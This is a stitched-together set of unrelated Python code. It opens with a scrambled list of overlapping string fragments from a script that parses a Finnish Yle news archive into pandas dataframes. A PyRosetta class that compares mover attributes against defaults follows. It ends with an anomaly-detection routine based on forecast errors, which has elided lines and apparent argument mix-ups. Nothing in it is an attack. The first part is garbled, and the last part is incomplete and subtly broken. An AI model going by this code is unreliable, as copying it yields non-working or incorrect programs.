"except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article in data[\"data\"]: #",
"argparse.ArgumentParser( description='Yle news archive reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile',",
"markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames",
"counter = 0 print(\"Parsing job started..\") for fname in fnames: counter += 1",
"# skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\"",
"continue text = paragraph[\"text\"].strip() # slows down, but if there's no hurry then",
"= len(fnames) counter = 0 print(\"Parsing job started..\") for fname in fnames: counter",
"1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data",
"= os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df",
"print(\"Error creating output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter",
"counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading",
"for df files except Exception as e: print(\"Error creating output path!\") print(e) #",
"not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as f: try: data",
"from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes') args = argparser.parse_args() main(args)",
"clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text",
"if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as f: try:",
"'published': article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]: # skip images",
"'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]: #",
"toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_",
"def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): #",
"counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__",
"**metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) # Making output directory try:",
"\"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader - parse archive data to",
"\", fname) continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError:",
"# Article content for paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"]",
"# 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list):",
"text = paragraph[\"text\"].strip() # slows down, but if there's no hurry then the",
"job started..\") for fname in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id',",
"etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text'",
"zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping",
"output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for",
"extension for df files except Exception as e: print(\"Error creating output path!\") print(e)",
"Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for",
"if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if",
"dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed",
"= { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article",
"list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() #",
"= os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception as e: print(\"Error",
"os from markdown import markdown from bs4 import BeautifulSoup import ftfy import pandas",
"[Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html,",
"article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]: # skip images etc.",
"'6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph",
"- parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki')",
"text } df = df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath =",
"main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter = 0",
"'url', 'published', 'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \",",
"default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes') args",
"for paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in [\"text\",",
"df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True)",
"= ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text =",
"article in data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url':",
"text = fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data = {",
"# Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with",
"__name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader - parse archive",
"the text will be cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed",
"description='Yle news archive reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\",",
"json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article in data[\"data\"]:",
"archive reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded",
"= fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata,",
"df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\")",
"markdown from bs4 import BeautifulSoup import ftfy import pandas as pd def fix_encoding(text):",
"from markdown import markdown from bs4 import BeautifulSoup import ftfy import pandas as",
"print(\"Error reading file, skipping \", fname) for article in data[\"data\"]: # Metadata metadata",
"fnames = zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job started..\") for",
"for fname in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url',",
"pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data if not fname.endswith(\".json\"):",
"'yle_id', 'url', 'published', 'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping file",
"zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing",
"BeautifulSoup import ftfy import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh.",
"'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue",
"paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]:",
"text will be cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed data",
"paragraph[\"text\"].strip() # slows down, but if there's no hurry then the text will",
"exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception as",
"{'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped",
"= 0 print(\"Parsing job started..\") for fname in fnames: counter += 1 df",
"skipping \", fname) for article in data[\"data\"]: # Metadata metadata = { 'doc_id':",
"html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ =",
"print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader",
"print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 == 0:",
"if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader - parse",
"# Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed",
"def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter =",
"article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]:",
"Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname)",
"['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\"",
"'text': text } df = df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath",
"argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes')",
"will be cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary",
"output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5",
"continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"],",
"= { **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) # Making output",
"= argparse.ArgumentParser( description='Yle news archive reader - parse archive data to Pandas dataframes')",
"paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text' = ['resource',",
"output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception as e:",
"Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl'",
"as e: print(\"Error creating output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath)",
"print(\"Parsing job started..\") for fname in fnames: counter += 1 df = pd.DataFrame(",
"fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata, 'text':",
"markdown import markdown from bs4 import BeautifulSoup import ftfy import pandas as pd",
"{ 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content",
"content for paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in",
"to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory",
"for article in data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"],",
"paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but if there's no hurry",
"return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi",
"def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text)",
"# Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"]",
"# Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath =",
"fname) continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error",
"continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading",
"kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def",
"fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) #",
"print(\"Skipping file \", fname) continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\"))",
"zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job started..\")",
"'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text",
"and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text =",
"text = clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata, 'text': text",
"f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname)",
"Parsed data dictionary parsed_data = { **metadata, 'text': text } df = df.append(parsed_data,",
"import zipfile import argparse import sys import json import re import os from",
"{ **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) # Making output directory",
"} df = df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir,",
"try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension",
"path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 ==",
"fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867)",
"{x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle",
"pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text):",
"== \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader - parse archive data",
"argparser = argparse.ArgumentParser( description='Yle news archive reader - parse archive data to Pandas",
"= ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist()",
"there's no hurry then the text will be cleaner text = fix_encoding(text) text",
"except Exception as e: print(\"Error creating output path!\") print(e) # Saving dataframe as",
"''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files",
"'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for",
"hurry then the text will be cleaner text = fix_encoding(text) text = clean_markdown(text)",
"directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl",
"try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for",
"<NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä #",
"files except Exception as e: print(\"Error creating output path!\") print(e) # Saving dataframe",
"df = df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir, fname)",
"= paragraph[\"text\"].strip() # slows down, but if there's no hurry then the text",
"= zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job started..\") for fname",
"if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text' =",
"dictionary parsed_data = { **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) #",
"os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception as e: print(\"Error creating",
"num_files = len(fnames) counter = 0 print(\"Parsing job started..\") for fname in fnames:",
"Article content for paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not",
"# slows down, but if there's no hurry then the text will be",
"output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' #",
"# MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan",
"5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\":",
"reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from",
"import ftfy import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011",
"article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text =",
"data dictionary parsed_data = { **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True)",
"Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] }",
"**Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args):",
"isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip()",
"24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne**",
"skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue",
"0 print(\"Parsing job started..\") for fname in fnames: counter += 1 df =",
"text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter",
"import markdown from bs4 import BeautifulSoup import ftfy import pandas as pd def",
"ftfy import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return",
"= json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article in",
"[\"text\", \"heading\"]: text = \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if",
"paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but if there's",
"import BeautifulSoup import ftfy import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja",
"started..\") for fname in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id',",
"Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y}",
"images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue #",
"no hurry then the text will be cleaner text = fix_encoding(text) text =",
"be cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data",
"parsed_data = { **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) # Making",
"MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä",
"import json import re import os from markdown import markdown from bs4 import",
"'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph in",
"print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser(",
"then the text will be cleaner text = fix_encoding(text) text = clean_markdown(text) #",
"data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article",
"element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but if there's no",
"text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames =",
"counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph",
"mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True))",
"\"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text",
"zipfile import argparse import sys import json import re import os from markdown"
] |
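Each JSON file in the archive zip becomes one pickled dataframe under --outputdir, carrying the five columns the script declares. A minimal consumption sketch; the path below is hypothetical, since actual filenames mirror the JSON files inside the zip:

import pandas as pd

# Hypothetical output path; actual names mirror the JSON files inside the zip.
df = pd.read_pickle("./data/parsed/example.pkl")
print(df.columns.tolist())  # ['doc_id', 'yle_id', 'url', 'published', 'text']
print(df.head())

Note that DataFrame.append, used in the parser above, was removed in pandas 2.0; on current pandas the equivalent is to accumulate the parsed_data dicts in a list and build the frame once with pd.DataFrame(rows, columns=...).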
import pyrosetta
import pandas as pd
from typing import Tuple, List, Dict, Set, Any, Optional, Sequence
from .base import BaseDocumentarian


class AttributeDocumentarian(BaseDocumentarian):
    """
    Analyses a Pyrosetta object and determines what is different from default.
    For example, given a working XML script:

    >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser()
    >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml')
    >>> protocol.apply(pose)

    One can reverse engineer it, thusly:

    >>> pm = protocol.get_mover(1)
    >>> print(pm.mover_name())  # mover called in script!
    >>> AttributeDocumentarian(pm).compare(evo)  # -> pd.DataFrame

    ---------------------------
    Attributes:

    * target: instance
    * target_cls: class
    * base: The tuple of classes inherited (``__mro__``)
    * uninherited: The set of attributes that are absent in the parent class
    * citation: string of citation

    Methods:

    * describe(): describe attributes
    * test(): calls the methods
    * compare(): compares the results of a ``test()`` to that of a blank instance
    """

    @property
    def uninherited(self) -> Set[str]:
        """
        The set of attributes that are absent in the parent class.
        Has no idea if others were overwritten though!

        :rtype: Set[str]
        """
        if len(self.base) > 1:
            return set(dir(self.base[0])) - set(dir(self.base[1]))
        return set()  # no parent class to diff against

    def describe(self, iterable: Optional[Sequence[str]] = None) -> None:
        """
        Describe attributes by calling help.
        If ``iterable`` is provided, it will print only those.
        """
        if iterable is None:
            iterable = dir(self.target)
        for methodname in iterable:
            print(f'## {methodname}')
            method = getattr(self.target, methodname)
            help(method)

    def test(self,
             iterable: Optional[Sequence[str]] = None,
             silent: bool = True) -> Dict[str, Any]:
        """
        Calls without arguments the methods.
        If ``iterable`` is provided, it will call only those.
        Returns a dictionary of the results.
        """
        if iterable is None:
            iterable = dir(self.target)
        results = {}
        for methodname in iterable:
            method = getattr(self.target, methodname)
            try:
                result = method()
                results[methodname] = result
                if silent is False:
                    print(f'Calling worked for {methodname}: {result}')
            except TypeError as error:
                results[methodname] = 'N/A'
                if silent is False:
                    print(f'Calling failed for {methodname}: {error}')
        return results

    def test_uninherited(self, silent: bool = True) -> dict:
        """
        Calls without arguments the methods that were not inherited.
        """
        return self.test(self.uninherited, silent)

    def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame:
        """
        Tests the methods (see ``test()``) and compares them to a generic
        instance, or to ``reference`` if provided.
        """
        c = self.test()
        if reference is None:
            reference = self.target_cls()
        refexplorer = self.__class__(reference)
        r = refexplorer.test()
        return self._make_table(c, r)

    def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame:
        """
        Tests the uninherited methods (see ``test()``) and compares them to a
        generic instance, or to ``reference`` if provided.
        """
        c = self.test_uninherited()
        if reference is None:
            reference = self.target_cls()
        refexplorer = self.__class__(reference)
        r = refexplorer.test_uninherited()
        return self._make_table(c, r)

    def _make_table(self, case: Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame:
        assert case, f'make_table cannot make a table without data (case={case}, ref={ref})'
        # `case` holds the target's results and `ref` the reference's
        proto = [{'attribute': k,
                  'target': case[k],
                  'reference': ref[k],
                  'equal': str(ref[k]) == str(case[k])}
                 for k in case.keys()]
        comparison = pd.DataFrame(proto)
        return comparison.set_index(['attribute'])
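Stripped of the PyRosetta specifics, the comparison table that ``compare()`` builds reduces to a few lines of pandas. This sketch uses made-up result dictionaries in place of two real ``test()`` runs:

import pandas as pd

case = {'mover_name': 'FastRelax', 'nstruct': 5}  # hypothetical results from the configured mover
ref = {'mover_name': 'FastRelax', 'nstruct': 1}   # hypothetical results from a default instance

proto = [{'attribute': k,
          'target': case[k],
          'reference': ref[k],
          'equal': str(ref[k]) == str(case[k])}
         for k in case.keys()]
print(pd.DataFrame(proto).set_index(['attribute']))

Rows where ``equal`` is False are the settings that the script changed away from the defaults.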
import more_itertools as mit
import numpy as np

# Methods to do dynamic error thresholding on timeseries data
# Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf


def get_forecast_errors(y_hat,
                        y_true,
                        window_size=5,
                        batch_size=30,
                        smoothing_percent=0.05,
                        smoothed=True):
    """
    Calculates the forecasting error for two arrays of data.
    If smoothed, the errors are smoothed with EWMA.

    Args:
        y_hat (list): forecasted values. len(y_hat)==len(y_true).
        y_true (list): true values. len(y_hat)==len(y_true).
        window_size (int):
        batch_size (int):
        smoothing_percent (float):
        smoothed (bool): whether the returned errors should be smoothed with EWMA.

    Returns:
        (list): error residuals. Smoothed if specified by user.
    """
    errors = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)]

    if not smoothed:
        return errors

    historical_error_window = int(window_size * batch_size * smoothing_percent)
    moving_avg = []
    for i in range(len(errors)):
        left_window = i - historical_error_window
        right_window = ...
        ...


def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer):
    """
    Extracts anomalies from the errors.

    Args:
        y_true ():
        smoothed_errors ():
        window_size (int):
        batch_size (int):
        ...
    """
    if len(y_true) <= batch_size * window_size:
        raise ValueError("Window size (%s) larger than y_true (len=%s)."
                         % (batch_size, len(y_true)))

    num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size)

    anomalies_indices = []
    for i in range(num_windows + 1):
        prev_index = i * batch_size
        curr_index = (window_size * batch_size) + (i * batch_size)

        if i == num_windows:  # the last window runs to the end of the series
            curr_index = len(y_true)

        window_smoothed_errors = smoothed_errors[prev_index:curr_index]
        window_y_true = y_true[prev_index:curr_index]

        epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer)
        window_anom_indices = get_anomalies(
            window_smoothed_errors,
            window_y_true,
            sd_threshold,
            i,
            anomalies_indices,
            error_buffer
        )

        # get anomalies from inverse of smoothed errors
        # This was done in the implementation of ...
        # we get the inverse by flipping around the mean
        mu = np.mean(window_smoothed_errors)
        smoothed_errors_inv = [mu + (mu - e) for e in window_smoothed_errors]
        epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer)
        inv_anom_indices = get_anomalies(
            smoothed_errors_inv,
            window_y_true,
            sd_inv,
            i,
            anomalies_indices,
            len(y_true)
        )
        anomalies_indices = list(set(anomalies_indices + inv_anom_indices))

        anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices])

    # group anomalies into continuous sequences
    anomalies_indices = sorted(list(set(anomalies_indices)))
    anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)]
    anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not g[0] == g[-1]]

    # generate "scores" for anomalies based on the max distance from epsilon for each sequence
    anomalies_scores = []
    for e_seq in anomaly_sequences:
        denominator = np.mean(smoothed_errors) + np.std(smoothed_errors)
        score = max([
            abs(smoothed_errors[x] - epsilon) / denominator
            for x in range(e_seq[0], e_seq[1])
        ])
        anomalies_scores.append(score)

    return anomaly_sequences, anomalies_scores


